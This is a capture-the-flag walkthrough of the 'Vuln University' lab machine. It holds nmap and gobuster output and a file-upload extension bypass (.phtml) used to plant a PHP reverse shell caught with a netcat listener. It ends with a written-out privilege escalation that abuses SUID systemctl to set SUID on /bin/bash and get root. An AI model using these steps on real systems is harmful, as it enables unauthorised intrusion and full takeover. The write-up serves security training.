3 min readSep 15, 2020


nmap -sC -sV $IPStarting Nmap 7.80 ( ) at 2020-09-15 20:30 EDT                                                                              [11/18]
Nmap scan report for
Host is up (0.17s latency).
Not shown: 994 closed ports
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -7h39m58s, deviation: 2h18m34s, median: -8h59m59s
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
|_ System time: 2020-09-15T11:30:49-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-15T15:30:50
|_ start_date: N/A
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 45.13 seconds


gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtGobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
2020/09/15 20:40:18 Starting gobuster
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/internal (Status: 301)

/internal is a page where we can upload an image and through /images we can view it.


Now we can not upload a php reverse shell due to it’s extension is not allowed so we can make wordlist of possible php extension to by pass blacklist


.phtml is the only extension that is accepted so we are going to change our reverse shell's extension and then upload and set a net cat listener on our terminal

nc -lvp 5555

And access the reverse shell on the web server

Stabilize Shell

First get a bash with python -c 'import pty; pty.spawn("/bin/bash")' Then

  1. ctrl+z
  2. stty raw -echo
  3. type fg and press enter x2.

You will get a stabilize shell with auto tab complete and then export TERM=xterm for using clear command.

Privilege Escalation

Now we have to find a file which has SUID means which can set SUID permissions so we can issue a command to find these files

find / -perm /4000

And we will find sytemctl which can set SUID

Now search for systemctl on GTFOBINS and slightly modifying the command chmod +s /bin/bash it will set SUID on bash to run as root

echo '[Service]
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Now run the command bash-p You will be root.